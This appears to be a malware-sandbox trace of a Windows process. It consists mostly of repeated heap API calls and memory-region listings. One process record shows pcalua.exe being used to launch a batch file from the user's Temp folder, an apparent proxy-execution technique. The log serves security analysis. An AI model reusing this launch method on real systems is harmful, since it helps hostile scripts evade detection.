[0373.714] GetProcessHeap () returned 0x410000
[0373.714] GetProcessHeap () returned 0x410000
[0373.714] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427d60) returned 1
[0373.714] GetProcessHeap () returned 0x410000
[0373.714] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427d60) returned 0x20
[0373.715] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d60 | out: hHeap=0x410000) returned 1
[0373.715] GetProcessHeap () returned 0x410000
[0373.715] GetProcessHeap () returned 0x410000
[0373.715] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427150) returned 1
[0373.715] GetProcessHeap () returned 0x410000
[0373.715] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427150) returned 0x30
[0373.716] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427150 | out: hHeap=0x410000) returned 1
[0373.716] GetProcessHeap () returned 0x410000
[0373.716] GetProcessHeap () returned 0x410000
[0373.716] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427d90) returned 1
[0373.716] GetProcessHeap () returned 0x410000
[0373.716] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427d90) returned 0x20
[0373.717] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d90 | out: hHeap=0x410000) returned 1
[0373.717] GetProcessHeap () returned 0x410000
[0373.717] GetProcessHeap () returned 0x410000
[0373.717] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427df0) returned 1
[0373.717] GetProcessHeap () returned 0x410000
[0373.717] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427df0) returned 0x24
[0373.718] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427df0 | out: hHeap=0x410000) returned 1
[0373.718] GetProcessHeap () returned 0x410000
[0373.718] GetProcessHeap () returned 0x410000
[0373.718] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427dc0) returned 1
[0373.718] GetProcessHeap () returned 0x410000
[0373.718] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427dc0) returned 0x20
[0373.719] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427dc0 | out: hHeap=0x410000) returned 1
[0373.719] GetProcessHeap () returned 0x410000
[0373.719] GetProcessHeap () returned 0x410000
[0373.719] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b7a0) returned 1
[0373.719] GetProcessHeap () returned 0x410000
[0373.719] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b7a0) returned 0x4c
[0373.720] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b7a0 | out: hHeap=0x410000) returned 1
[0373.720] GetProcessHeap () returned 0x410000
[0373.720] GetProcessHeap () returned 0x410000
[0373.720] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427e20) returned 1
[0373.720] GetProcessHeap () returned 0x410000
[0373.720] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427e20) returned 0x20
[0373.721] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427e20 | out: hHeap=0x410000) returned 1
[0373.721] GetProcessHeap () returned 0x410000
[0373.721] GetProcessHeap () returned 0x410000
[0373.721] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x429220) returned 1
[0373.721] GetProcessHeap () returned 0x410000
[0373.721] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x429220) returned 0x18
[0373.722] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429220 | out: hHeap=0x410000) returned 1
[0373.722] GetProcessHeap () returned 0x410000
[0373.722] GetProcessHeap () returned 0x410000
[0373.722] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4279a0) returned 1
[0373.722] GetProcessHeap () returned 0x410000
[0373.722] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4279a0) returned 0x20
[0373.723] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4279a0 | out: hHeap=0x410000) returned 1
[0373.723] GetProcessHeap () returned 0x410000
[0373.723] GetProcessHeap () returned 0x410000
[0373.723] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4279d0) returned 1
[0373.723] GetProcessHeap () returned 0x410000
[0373.723] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4279d0) returned 0x20
[0373.723] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4279d0 | out: hHeap=0x410000) returned 1
[0373.724] GetProcessHeap () returned 0x410000
[0373.724] GetProcessHeap () returned 0x410000
[0373.724] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427a00) returned 1
[0373.724] GetProcessHeap () returned 0x410000
[0373.724] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427a00) returned 0x20
[0373.724] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a00 | out: hHeap=0x410000) returned 1
[0373.724] GetProcessHeap () returned 0x410000
[0373.725] GetProcessHeap () returned 0x410000
[0373.725] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427a30) returned 1
[0373.725] GetProcessHeap () returned 0x410000
[0373.725] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427a30) returned 0x20
[0373.725] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a30 | out: hHeap=0x410000) returned 1
[0373.726] GetProcessHeap () returned 0x410000
[0373.726] GetProcessHeap () returned 0x410000
[0373.726] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x429240) returned 1
[0373.726] GetProcessHeap () returned 0x410000
[0373.726] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x429240) returned 0x18
[0373.726] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429240 | out: hHeap=0x410000) returned 1
[0373.726] GetProcessHeap () returned 0x410000
[0373.726] GetProcessHeap () returned 0x410000
[0373.726] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427a60) returned 1
[0373.726] GetProcessHeap () returned 0x410000
[0373.727] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427a60) returned 0x20
[0373.727] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a60 | out: hHeap=0x410000) returned 1
[0373.727] GetProcessHeap () returned 0x410000
[0373.727] GetProcessHeap () returned 0x410000
[0373.727] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427a90) returned 1
[0373.728] GetProcessHeap () returned 0x410000
[0373.728] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427a90) returned 0x20
[0373.728] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a90 | out: hHeap=0x410000) returned 1
[0373.728] GetProcessHeap () returned 0x410000
[0373.728] GetProcessHeap () returned 0x410000
[0373.728] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427ac0) returned 1
[0373.729] GetProcessHeap () returned 0x410000
[0373.729] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427ac0) returned 0x20
[0373.729] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427ac0 | out: hHeap=0x410000) returned 1
[0373.729] GetProcessHeap () returned 0x410000
[0373.729] GetProcessHeap () returned 0x410000
[0373.730] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427af0) returned 1
[0373.730] GetProcessHeap () returned 0x410000
[0373.730] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427af0) returned 0x20
[0373.730] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427af0 | out: hHeap=0x410000) returned 1
[0373.730] GetProcessHeap () returned 0x410000
[0373.730] GetProcessHeap () returned 0x410000
[0373.731] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427b50) returned 1
[0373.731] GetProcessHeap () returned 0x410000
[0373.731] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427b50) returned 0x20
[0373.731] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b50 | out: hHeap=0x410000) returned 1
[0373.731] GetProcessHeap () returned 0x410000
[0373.731] GetProcessHeap () returned 0x410000
[0373.732] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427bb0) returned 1
[0373.732] GetProcessHeap () returned 0x410000
[0373.732] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427bb0) returned 0x20
[0373.732] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427bb0 | out: hHeap=0x410000) returned 1
[0373.732] GetProcessHeap () returned 0x410000
[0373.732] GetProcessHeap () returned 0x410000
[0373.733] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427be0) returned 1
[0373.733] GetProcessHeap () returned 0x410000
[0373.733] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427be0) returned 0x20
[0373.733] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427be0 | out: hHeap=0x410000) returned 1
[0373.733] GetProcessHeap () returned 0x410000
[0373.734] GetProcessHeap () returned 0x410000
[0373.734] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427c70) returned 1
[0373.734] GetProcessHeap () returned 0x410000
[0373.734] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427c70) returned 0x20
[0373.734] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c70 | out: hHeap=0x410000) returned 1
[0373.734] GetProcessHeap () returned 0x410000
[0373.734] GetProcessHeap () returned 0x410000
[0373.735] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427ca0) returned 1
[0373.735] GetProcessHeap () returned 0x410000
[0373.735] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427ca0) returned 0x20
[0373.735] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427ca0 | out: hHeap=0x410000) returned 1
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x429260) returned 1
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x429260) returned 0x18
[0373.736] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429260 | out: hHeap=0x410000) returned 1
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427b20) returned 1
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427b20) returned 0x20
[0373.737] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b20 | out: hHeap=0x410000) returned 1
[0373.737] GetProcessHeap () returned 0x410000
[0373.737] GetProcessHeap () returned 0x410000
[0373.737] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4291e0) returned 1
[0373.737] GetProcessHeap () returned 0x410000
[0373.738] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4291e0) returned 0x18
[0373.738] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4291e0 | out: hHeap=0x410000) returned 1
[0373.738] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1
[0373.738] exit (_Code=0)
Process:
id = "8"
image_name = "pcalua.exe"
filename = "c:\\windows\\system32\\pcalua.exe"
page_root = "0x163b000"
os_pid = "0xc18"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0x384"
cmd_line = "pcalua.exe -a \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1638
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1639
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1640
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1641
start_va = 0x190000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 1642
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1643
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1644
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1645
start_va = 0xffe50000
end_va = 0xffe56fff
monitored = 1
entry_point = 0xffe51740
region_type = mapped_file
name = "pcalua.exe"
filename = "\\Windows\\System32\\pcalua.exe" (normalized: "c:\\windows\\system32\\pcalua.exe")
Region:
id = 1646
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1647
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1648
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1649
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1650
start_va = 0x210000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1651
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1652
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1653
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1654
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1655
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1656
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1657
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1658
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1659
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1660
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1661
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1662
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1663
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1664
start_va = 0x7fef78e0000
end_va = 0x7fef78fbfff
monitored = 0
entry_point = 0x7fef78ef6ec
region_type = mapped_file
name = "pcaui.dll"
filename = "\\Windows\\System32\\pcaui.dll" (normalized: "c:\\windows\\system32\\pcaui.dll")
Region:
id = 1665
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1666
start_va = 0x7fefa140000
end_va = 0x7fefa196fff
monitored = 0
entry_point = 0x7fefa141118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 1667
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1668
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1669
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1670
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 1671
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1672
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1673
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1674
start_va = 0x7fefa120000
end_va = 0x7fefa131fff
monitored = 0
entry_point = 0x7fefa121050
region_type = mapped_file
name = "aepic.dll"
filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll")
Region:
id = 1675
start_va = 0x74040000
end_va = 0x74042fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sfc.dll"
filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")
Region:
id = 1676
start_va = 0x7fefa110000
end_va = 0x7fefa11ffff
monitored = 0
entry_point = 0x7fefa111010
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll")
Region:
id = 1677
start_va = 0x7fefbe00000
end_va = 0x7fefbef1fff
monitored = 0
entry_point = 0x7fefbe2ac20
region_type = mapped_file
name = "dui70.dll"
filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll")
Region:
id = 1678
start_va = 0xc0000
end_va = 0xc1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1679
start_va = 0x7fef93f0000
end_va = 0x7fef946bfff
monitored = 0
entry_point = 0x7fef93f11d4
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 1680
start_va = 0x4a0000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004a0000"
filename = ""
Region:
id = 1681
start_va = 0x210000
end_va = 0x30ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1682
start_va = 0x3a0000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003a0000"
filename = ""
Region:
id = 1683
start_va = 0xd0000
end_va = 0xf8fff
monitored = 0
entry_point = 0xd1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1684
start_va = 0x4a0000
end_va = 0x627fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004a0000"
filename = ""
Region:
id = 1685
start_va = 0x650000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 1686
start_va = 0xd0000
end_va = 0xf8fff
monitored = 0
entry_point = 0xd1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1687
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1688
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1689
start_va = 0x660000
end_va = 0x7e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000660000"
filename = ""
Region:
id = 1690
start_va = 0x7f0000
end_va = 0x1beffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 1691
start_va = 0xd0000
end_va = 0xd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pcalua.exe.mui"
filename = "\\Windows\\System32\\en-US\\pcalua.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\pcalua.exe.mui")
Region:
id = 1692
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1693
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1694
start_va = 0x100000
end_va = 0x100fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1695
start_va = 0x110000
end_va = 0x111fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 1696
start_va = 0x1bf0000
end_va = 0x1e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bf0000"
filename = ""
Region:
id = 1697
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1698
start_va = 0x1bf0000
end_va = 0x1dbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bf0000"
filename = ""
Region:
id = 1699
start_va = 0x1de0000
end_va = 0x1e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001de0000"
filename = ""
Region:
id = 1700
start_va = 0x1bf0000
end_va = 0x1ccefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001bf0000"
filename = ""
Region:
id = 1701
start_va = 0x1d40000
end_va = 0x1dbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d40000"
filename = ""
Region:
id = 1702
start_va = 0x7fefbcf0000
end_va = 0x7fefbd07fff
monitored = 0
entry_point = 0x7fefbcf1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 1703
start_va = 0x1e60000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e60000"
filename = ""
Region:
id = 1704
start_va = 0x1f70000
end_va = 0x289ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 1705
start_va = 0x310000
end_va = 0x38cfff
monitored = 0
entry_point = 0x31cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1706
start_va = 0x310000
end_va = 0x38cfff
monitored = 0
entry_point = 0x31cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1707
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1708
start_va = 0x28a0000
end_va = 0x299ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 1709
start_va = 0x29a0000
end_va = 0x2c6efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1710
start_va = 0x100000
end_va = 0x101fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 1711
start_va = 0x120000
end_va = 0x120fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 1712
start_va = 0x2c70000
end_va = 0x2ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c70000"
filename = ""
Region:
id = 1713
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1714
start_va = 0x7fefc180000
end_va = 0x7fefc2abfff
monitored = 0
entry_point = 0x7fefc1894bc
region_type = mapped_file
name = "propsys.dll"
